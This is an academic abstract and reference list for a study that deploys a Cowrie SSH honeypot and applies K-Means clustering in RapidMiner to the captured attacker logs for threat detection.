Abstract

This paper focuses on interaction of Honeypots with Machine Learning for threat detection by finding out the patterns, anomalies, and learn from them. In this particular study, Cowrie Honeypot has been deployed on an Ubuntu Server, and its own environment is set up using python. The environment is totally isolated from the original actual server environment, and cowrie mimics the original environment, thereby luring the Hackers/Attackers to fall into the trap. Cowrie generally interacts with the SSH environment, and all the commands, IP addresses, and timestamps are captured in the log file, which is saved in the path defined by the Administrator. Further, the log file is converted to csv file for feeding the collected data to Altair RapidMiner for its Clustering Algorithm. In RapidMiner, the csv file is retrieved, fed to Select Attribute so that the desired attributes are selected and filtered. Cowrie log generally contains a handful of noise, so normalization is needed. However, since normalization is done using z-transformation, it accepts only numerical values. This nominal-to-numerical converter is added in the process for further feeding to the Normalize operator. The normalized data is then fed to the Clustering operator, where the K-Means Clustering Algorithm is deployed in this research. In this study, 3 Clusters are studied. Using clustering analysis revealed distinct patterns in SSH honeypot attack behavior, effectively transforming unprocessed log data into actionable intelligence for strengthening proactive security responses. In summary, integrating honeypot deception strategies with machine learning represents a significant advancement in the field of cybersecurity. This combined approach enhances threat detection and analysis while paving the way for robust, adaptive, and self-evolving security systems capable of countering ever-changing cyber threats.

References

• Shyamalendu Paul, Amitava Podder, Kaustav Roy, (2024), Exploring the Impact of AI-based Honeypots on Network Security, Educational Administration: Theory and Practice, 30(6), 251-258, Doi: 10.53555/kuey.v30i6.5155
• Iyer, Kumrashan Indranil. (2021). Adaptive honeypots: Dynamic deception tactics in modern cyber defense. International Journal of Science and Research Archive. 04. 340-351. 10.30574/ijsra.2021.4.1.0210.
• Dakic, Vedran & Regvart, Damir. (2025). Advancing Cybersecurity with Honeypots and Deception Strategies. Informatics. 12. 14. 10.3390/informatics12010014.
• Narayana Gaddam. (2025). AI-enhanced honeypots for advanced cyber deception strategies. QIT Press - International Journal of Cyber Security Research and Development (QITP-IJCSRD), 5(1), 9–19.
• J. Franco, A. Aris, B. Canberk and A. S. Uluagac, "A Survey of Honeypots and Honeynets for Internet of Things, Industrial Internet of Things, and Cyber-Physical Systems," in IEEE Communications Surveys & Tutorials, vol. 23, no. 4, pp. 2351-2383
• Martínez S., C. J. ., Moreno A., H. O. ., & Hernández A., M. B. . (2023). Analysis of Intrusions into Computer Systems using Honeypots. International Journal of Intelligent Systems and Applications in Engineering, 11(6s), 461–472. Retrieved from https://ijisae.org/index.php/IJISAE/article/view/2871
• Sokol, P., Míšek, J. & Husák, M. Honeypots and honeynets: issues of privacy. EURASIP J. on Info. Security 2017, 4 (2017). https://doi.org/10.1186/s13635-017-0057-4
• Mokube, Iyatiti & Adams, Michele. (2007). Honeypots: concepts, approaches, and challenges. 321-326. 10.1145/1233341.1233399.
• Bharadiya, Jasmin. (2023). Machine Learning in Cybersecurity: Techniques and Challenges. European Journal of Technology. 7. 10.47672/ejt.1486.
• V. -I. Năstase, M. -E. Mihăilescu, S. Weisz, L. V. Dagilis, D. Mihai and M. Carabas, "Cowrie SSH Honeypot: Architecture, Improvements and Data Visualization," 2024 23rd RoEduNet Conference: Networking in Education and Research (RoEduNet), Bucharest, Romania, 2024, pp. 1-7, doi: 10.1109/RoEduNet64292.2024.10722609
• Krajčík, Patrik & Mikuláš, Matúš & Helebrandt, Pavol & Kotuliak, Ivan. (2025). Improvement of Cowrie honeypot interaction and deception capabilities. 1-9. 10.1109/KIT67756.2025.11205433.
• Li, Youguo & Wu, Haiyan. (2012). A Clustering Method Based on K-Means Algorithm. Physics Procedia. 25. 1104-1109. 10.1016/j.phpro.2012.03.206.
• Zhang, Chaoyu & Wang, Ning & Hou, Y & Lou, Wenjing. (2025). Machine Learning-Based Intrusion Detection Systems: Capabilities, Methodologies, and Open Research Challenges. 10.36227/techrxiv.173627464.48290242/v1.